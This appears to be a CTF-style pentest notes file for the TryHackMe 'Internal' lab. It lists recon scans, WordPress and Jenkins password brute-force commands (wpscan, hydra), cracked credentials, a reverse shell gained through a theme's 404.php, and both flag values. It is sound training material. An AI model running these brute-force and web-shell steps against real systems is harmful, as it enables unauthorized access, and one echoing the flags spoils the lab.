-
Machine:
Internal -
Url:
http://internal.thm -
IP Address:
10.10.169.15 -
Scope of work:
- find user.txt (gain sys shell) & root.txt (privesc)
- report any/all vulnerabilities found doing so
find step-by-step pentest notes here
-
Nmap scan [results]
- cmd:
nmap -sC -sV -A -o nmap.log internal.thm
- cmd:
-
Gobuster scan [results]: main ip/domain
- cmd:
gobuster dir -u http://internal.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_0.log
- cmd:
-
Gobuster scan [results]: blog site
- cmd:
gobuster dir -u http://internal.thm/blog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_1.log
- cmd:
-
WPScan [results]
- cmd:
wpscan --url http://internal.thm/blog/ -e vp,vt,tt,cb,dbe,u,m -o wpscan.log
- cmd:
-
WPScan [results]: user login brute force
- cmd:
wpscan --url http://internal.thm/blog/ -P /usr/share/wordlists/rockyou.txt -o wpscan_user_bf.log
- cmd:
-
Login found for wordpress admin:
- username:
admin - password:
my2boys
- username:
-
Got reverse shell (
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php) -
Got user credentials:
- username:
aubreanna - password:
bubb13guM!@#123
- username:
-
Got
user.txtflag:THM{int3rna1_fl4g_1} -
Got Jenkins logins by brute force:
- username:
admin - password:
spongebob - cmd:
hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form -s 9999 "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
- username:
-
Got
root.txtflag:THM{d0ck3r_d3str0y3r}